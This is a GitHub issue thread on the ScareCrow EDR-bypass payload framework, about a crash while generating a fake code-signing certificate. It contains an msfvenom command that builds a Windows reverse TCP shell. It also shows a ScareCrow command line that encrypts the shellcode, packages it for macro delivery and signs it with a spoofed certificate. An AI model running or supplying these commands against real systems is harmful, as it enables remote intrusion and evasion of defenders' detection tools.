search

optiv / ScareCrow

ScareCrow - Payload creation framework designed around EDR bypass.
2.73k stars 507 forks source link

Code signing certificate generation fails #1

Closed axano closed 3 years ago

axano commented 3 years ago

Whenever i try to generate a binary it fails. I peaked at the code and saw that it fails at the point where the certificate is generated. I have tried it on an up to date kali linux and on a Debian 9 server.

The payload is generated with:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.197 LPORT=51251 -f raw > bin.raw

Tried multiple argument permutations.

Error:

└─$ /opt/ScareCrow/ScareCrow -I /home/kali/Desktop/bin.raw -domain axano.com  -Loader binary -delivery macro -url http://192.168.0.197/

  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
        \/     \/     \/            \/        \/                      
                                                        (@Tyl0us)
        “Fear, you must understand is more than a mere obstacle. 
        Fear is a TEACHER. the first one you ever had.”

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With cmd's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing cmd.exe With a Fake Cert
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6df56a]

goroutine 1 [running]:
ScareCrow/limelighter.GenerateCert(0x7ffe784ad450, 0x9)
        /opt/ScareCrow/limelighter/limelighter.go:56 +0x2ca
ScareCrow/limelighter.Signer(0x7ffe784ad450, 0x9, 0x0, 0x0, 0x0, 0x0, 0xc000448720, 0x7)
        /opt/ScareCrow/limelighter/limelighter.go:1040 +0x4c6
main.execute(0xc0000fa000, 0x76f099, 0x3)
        /opt/ScareCrow/ScareCrow.go:83 +0x63b
main.main()
        /opt/ScareCrow/ScareCrow.go:162 +0x906
Tylous commented 3 years ago

So it pulls the values from a legitimate SSL cert related to the domain. It looks like the domain your using doesn’t have one externally facing... if it’s internal it maybe not routing properly to get it. I’d try another domain and see if that resolves it.

axano commented 3 years ago

Right. It works with a domain thats publicly available. Thanks! If its possible please add error handling.